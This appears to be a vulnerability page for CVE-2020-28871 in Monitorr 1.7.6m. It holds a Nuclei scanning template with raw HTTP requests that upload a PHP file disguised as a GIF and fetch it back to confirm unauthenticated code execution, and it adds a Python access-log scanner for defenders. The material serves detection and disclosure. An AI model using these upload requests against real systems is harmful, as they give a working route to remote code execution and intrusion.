Monitorr 1.7.6m - Unauthenticated Remote Code Execution
ID: CVE-2020-28871
Severity: critical
Author: gy741
Tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr
Description
Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization lead to arbitrary file uploads in the web application. An unauthorized attacker with web access to the application could upload and execute a specially crafted file, leading to remote code execution within Monitorr.
YAML Source
id: CVE-2020-28871

info:
  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.
  remediation: |
    Upgrade to a patched version of Monitorr or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/48980
    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28871
    - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html
    - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28871
    cwe-id: CWE-434
    epss-score: 0.96887
    epss-percentile: 0.99706
    cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: monitorr
    product: monitorr
    shodan-query: http.favicon.hash:"-211006074"
    fofa-query: icon_hash="-211006074"
  tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr
variables:
  string: "CVE-2020-28871"

http:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: text/plain, */*; q=0.01
        Connection: close
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}

        -----------------------------31046105003900160576454225745
        Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
        Content-Type: image/gif

        GIF89a213213123<?php echo md5("{{string}}");unlink(__FILE__);?>

        -----------------------------31046105003900160576454225745--
      - |
        GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100995933100546a4f0a089f6920c72621802d76236c1bf6336544cb2706e2ed7c5022100e8db5aff3fb00d1eefb6327862de7f8d71d5f8461f6c26e7c605a75b572d2ff7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28871.yaml"
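The two requests in the template leave a recognizable trace in web server access logs: a POST to /assets/php/upload.php followed by a GET for a script file under /assets/data/usrimg/. The Python below is an added example for defenders, not part of the template or of Monitorr; it assumes Combined Log Format access logs, an assumed list of script extensions, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/assets/php/upload.php"   # upload endpoint named in the template
USRIMG_DIR = "/assets/data/usrimg/"      # directory the template reads back from
# Assumed list of server-side script extensions that never belong in an image directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)


def find_upload_abuse(lines):
    """Flag requests for script files under usrimg/.

    'high'   = the same client POSTed to upload.php earlier and got a 200 back
    'medium' = any other request for a script file there (probe, failed attempt)
    """
    uploaders, findings = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        path = unquote(m["path"].split("?", 1)[0])
        if m["method"] == "POST" and path.endswith(UPLOAD_PATH):
            uploaders.add(m["ip"])
        elif USRIMG_DIR in path.lower() and SCRIPT_EXT.search(path):
            hit = m["ip"] in uploaders and m["status"] == "200"
            findings.append({"ip": m["ip"], "time": m["ts"], "path": path,
                             "status": int(m["status"]),
                             "severity": "high" if hit else "medium"})
    return findings


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /assets/php/upload.php HTTP/1.1" 200 118 "-" "-"',
    '203.0.113.7 - - [12/Mar/2024:10:01:03 +0000] "GET /assets/data/usrimg/abc123.php HTTP/1.1" 200 32 "-" "-"',
    '198.51.100.9 - - [12/Mar/2024:10:05:00 +0000] "GET /assets/data/usrimg/logo.png HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [12/Mar/2024:10:06:00 +0000] "GET /monitorr/assets/data/usrimg/x.PHP HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Because the template's payload calls unlink(__FILE__) after it runs, the uploaded file may no longer be on disk, so the access log can be the only remaining evidence of the request pair.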